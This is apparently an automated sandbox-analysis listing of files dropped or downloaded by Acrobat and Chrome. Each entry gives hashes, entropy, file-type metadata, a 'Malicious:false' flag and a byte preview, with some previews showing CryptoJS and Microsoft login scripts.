                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                        Category:dropped
                                                                                                        Size (bytes):758601
                                                                                                        Entropy (8bit):7.98639316555857
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                                        MD5:3A49135134665364308390AC398006F1
                                                                                                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                                        Malicious:false
                                                                                                        Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 160932
                                                                                                        Category:dropped
                                                                                                        Size (bytes):543911
                                                                                                        Entropy (8bit):7.977303608379539
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:ONh3P65+Tegs6121D1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9UZ+bvHs:O3Pjegf121DMNB1DofjgJJJJm94+g
                                                                                                        MD5:5B21A6981E55EF9576D169BBED44BCDB
                                                                                                        SHA1:B3A14100B7E7C2C01D61B010A54937952D111E20
                                                                                                        SHA-256:9555E661370D1DC26605DAE88BDBC1ABA68038C769BF6E354A256B1A1C4C110E
                                                                                                        SHA-512:FCA72A5131D8780A17DF65BBFF37FBA88DBEA3B7AE991C3D893B21B9E6C1EED44DC12945C8DA39DE471FAC5013BE71D43E5BBB892994742BC33EF5934469B1B1
                                                                                                        Malicious:false
                                                                                                        Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1419751
                                                                                                        Entropy (8bit):7.976496077007677
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:/xTwYIGNPzWL07oYGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JTwZG5WLxYGZn3mlind9i4ufFXpAXkru
                                                                                                        MD5:E88AC53FE29BDF9402BCF11696989153
                                                                                                        SHA1:EC950FE1C9ABBFB3713A082FC43B451A7F1A708F
                                                                                                        SHA-256:EB1E6D431D432B488F5B17DD7806ED04260E4A37264F282367F02C466A98327C
                                                                                                        SHA-512:A08590B0F5C1F281046A9E9D03A481758991E8C9CA2A96B8F59644C182F9D6EC81E9834FEF46FB3B27074EE8605C5AED79AB30957AFCB7A2734AD5018CB5C502
                                                                                                        Malicious:false
                                                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 9 15:17:52 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2677
                                                                                                        Entropy (8bit):3.9899346575235852
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:8V9d/jTI79BHfidAKZdA1JehwiZUklqeh9y+3:8VPjgHey
                                                                                                        MD5:B9B6378EB3938C21FDAD212CE42CE169
                                                                                                        SHA1:444DE299C05E591586880E80814FF63479397BF6
                                                                                                        SHA-256:C2CEF0ECFCF214F28041AA06E3294674BB8BF3E02A0A2D38C80792FCDF2B682D
                                                                                                        SHA-512:E9526147D027024AB13AD9F5CE8D88C6103B390C2E79005FB8376DCA4C6AAFB073E49F3F26876597C23AF2AC2CD41203DDB0487C5A53365A7076FFE46883CE70
                                                                                                        Malicious:false
                                                                                                        Preview:L..................F.@.. ...$+.,......u..b......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I)Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Z9.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V)Z9.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V)Z9............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V)Z;............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........%.}H.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 9 15:17:52 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2679
                                                                                                        Entropy (8bit):4.005349457278476
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:8Xk9d/jTI79BHfidAKZdA10eh/iZUkAQkqehOy+2:8XkPjg99Qry
                                                                                                        MD5:9F7921D412608349661B3A07A1E0FC48
                                                                                                        SHA1:A0DF314306B8304345411AA13FE395B0F420C47F
                                                                                                        SHA-256:61B00D6A389B21509773D271D16EE84BBBC17024C434B7AFFDA8428A1D982361
                                                                                                        SHA-512:A1EEC8766EB8C9206D527163D88807047613875233286B363822B18A9D5F2AB4D07318034ADFD50041124777E798B128DDC73060F9A3CFF21C95815030FEA324
                                                                                                        Malicious:false
                                                                                                        Preview:L..................F.@.. ...$+.,....O.h..b......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I)Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Z9.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V)Z9.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V)Z9............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V)Z;............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........%.}H.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2693
                                                                                                        Entropy (8bit):4.017436244527571
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:8e9d/jTI79jHfidAKZdA14tIeh7sFiZUkmgqeh7ssy+BX:8ePjgjnKy
                                                                                                        MD5:49DB589B7D5333769F9FD8687D40FE69
                                                                                                        SHA1:3933189E1B6B49AA5B7E82C64F59EFA7BBC579A9
                                                                                                        SHA-256:C40D86AEA3E24B41FB0459271A2E499EB2CDD9D0B29CD56F774AC608320CB6FE
                                                                                                        SHA-512:9E290B06311B3539FC35E9148209AF33BE548FDB24FD48A407687EE332D2A903A19B0216D6B7B4136178E3CCB9F62CA88ACAD707AEB71554DDB6E67485EB81DC
                                                                                                        Malicious:false
                                                                                                        Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I)Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Z9.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V)Z9.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V)Z9............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........%.}H.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 9 15:17:52 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2681
                                                                                                        Entropy (8bit):4.004101569710212
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:8N9d/jTI79BHfidAKZdA1behDiZUkwqehiy+R:8NPjgOky
                                                                                                        MD5:9A08E2FAC5169BA501E9E3956181EEDD
                                                                                                        SHA1:AC0D35D321084D3BE9C2FD2B6D007EB468C1FFF8
                                                                                                        SHA-256:991496637BB8053429617B1454D2DF4928EEEC770B938B077426ABD4B7E9DEC7
                                                                                                        SHA-512:080F86FD783FD365A9F57452097E66931139FDAD7802F60886D3C51468055794EFE46C02883371705411829A04FD9D8B7B4057422641738BAC666F102C8D0FA1
                                                                                                        Malicious:false
                                                                                                        Preview:L..................F.@.. ...$+.,......c..b......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I)Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Z9.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V)Z9.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V)Z9............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V)Z;............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........%.}H.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 9 15:17:52 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2681
                                                                                                        Entropy (8bit):3.9930541117732714
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:8L9d/jTI79BHfidAKZdA1VehBiZUk1W1qehYy+C:8LPjge94y
                                                                                                        MD5:7215BA32168256BABA395D08B5BA4DC9
                                                                                                        SHA1:B5BC5E416729BF3EE24DDF6D71BF0C5A0E54A5EB
                                                                                                        SHA-256:24463C26DFCB3E14D9CD0AA14DEBB2EBD0B18D7E095BB4D423709494333BFD87
                                                                                                        SHA-512:70BB89A46913D34FE6C8222DB5ABC2B78BA233E846498DA7BF7C0DCB41410BFF5C798D07F685891D7F5FB9D52BA4E175B8F9785E5F4763B0FBB4C29479A53B02
                                                                                                        Malicious:false
                                                                                                        Preview:L..................F.@.. ...$+.,.....zo..b......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I)Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Z9.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V)Z9.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V)Z9............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V)Z;............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........%.}H.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 9 15:17:52 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2683
                                                                                                        Entropy (8bit):4.0039323508023905
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:8IE9d/jTI79BHfidAKZdA1duT6ehOuTbbiZUk5OjqehOuTbKy+yT+:8FPjg8TTTbxWOvTbKy7T
                                                                                                        MD5:99E510D67283D13306CCB8C1F1DF0B4D
                                                                                                        SHA1:D4A6A53DE4FD8C7380B285FCE4446AF3F485CDB3
                                                                                                        SHA-256:94B4BF79EF30842F87DAE0816F1766B13AA777E6FCD398B8639F88D3D9BFD62A
                                                                                                        SHA-512:1BD84306B1E4718F44A353A9B00C48391ED129036FC0F03D39B280AC1C020486A00D9DB9796A8D0891F1C8FC5885F51FC034DF744AAC7D9E044E4163B63A3525
                                                                                                        Malicious:false
                                                                                                        Preview:L..................F.@.. ...$+.,....\DZ..b......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I)Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V)Z9.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V)Z9.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V)Z9............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V)Z;............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........%.}H.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):48316
                                                                                                        Entropy (8bit):5.6346993394709
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                        MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                        Malicious:false
                                                                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):61052
                                                                                                        Entropy (8bit):7.996159932827634
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                                                        MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                                                        SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                                                        SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                                                        SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                                                        Malicious:false
                                                                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                                                                                        Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):3452
                                                                                                        Entropy (8bit):5.117912766689607
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                                                        MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                                                        SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                                                        SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                                                        SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                                                        Malicious:false
                                                                                                        URL:https://login.live.com/Me.htm?v=3
                                                                                                        Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                                                        Category:dropped
                                                                                                        Size (bytes):61052
                                                                                                        Entropy (8bit):7.996159932827634
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                                                        MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                                                        SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                                                        SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                                                        SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                                                        Malicious:false
                                                                                                        Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):1435
                                                                                                        Entropy (8bit):7.8613342322590265
